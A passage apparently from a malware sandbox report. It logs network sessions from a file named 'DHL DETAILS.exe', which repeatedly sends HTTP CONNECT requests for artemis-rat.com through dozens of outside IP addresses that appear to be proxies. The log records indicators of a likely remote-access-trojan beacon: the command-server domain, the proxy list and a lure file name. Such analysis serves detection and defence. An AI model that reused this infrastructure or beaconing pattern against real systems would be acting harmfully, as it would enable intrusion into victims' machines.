3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1354	192.168.2.5	53938	103.166.141.74	20074	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.633539915 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1355	192.168.2.5	53856	105.112.140.218	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.634021997 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.567538023 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.868460894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:23.270833969 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1356	192.168.2.5	53974	218.252.244.126	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.634371996 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1357	192.168.2.5	53966	14.103.24.20	8000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.642450094 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1358	192.168.2.5	54041	192.154.246.96	9000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.642540932 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1359	192.168.2.5	54048	162.159.250.145	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.642914057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.805310965 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1360	192.168.2.5	54002	94.23.220.136	19547	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.643151999 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.333197117 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.333367109 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1361	192.168.2.5	54063	172.67.14.237	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.643379927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.798046112 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1362	192.168.2.5	52656	8.242.85.6	999	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.643934011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.833118916 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1363	192.168.2.5	54049	104.20.125.124	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.644512892 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.798959017 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1364	192.168.2.5	53980	213.149.154.213	5678	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.644625902 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1365	192.168.2.5	53964	8.219.179.237	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.644977093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1366	192.168.2.5	53943	202.150.1.87	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.644979000 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1367	192.168.2.5	53998	185.110.190.99	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.645360947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1368	192.168.2.5	54019	193.84.89.202	8443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.645457983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.333249092 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1369	192.168.2.5	53942	103.231.78.36	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.645561934 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1370	192.168.2.5	53994	193.136.97.17	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.648680925 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.993920088 CET	806	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:18 GMT Server: Apache/2.4.56 (Debian) Content-Length: 614 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.56 (Debian) Server at artemis-rat.com Port 443</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1371	192.168.2.5	52593	45.81.232.17	61553	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.648806095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.833120108 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1372	192.168.2.5	54151	211.234.125.5	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.649441004 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1373	192.168.2.5	53464	51.75.125.208	48114	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.651556015 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.833200932 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:24.833262920 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.834048033 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1374	192.168.2.5	53929	115.244.127.160	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.651561975 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1375	192.168.2.5	54154	211.234.125.5	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.654069901 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1376	192.168.2.5	54162	211.234.125.5	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.655529976 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1377	192.168.2.5	54020	8.213.128.6	50001	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.661803961 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1378	192.168.2.5	54023	122.51.123.219	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.663242102 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1379	192.168.2.5	54021	194.247.173.17	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.664515972 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1380	192.168.2.5	54090	185.162.229.70	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.673571110 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.828041077 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1381	192.168.2.5	54109	104.18.20.160	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.680442095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.836627960 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1382	192.168.2.5	52672	103.113.71.230	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.685842037 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.736524105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

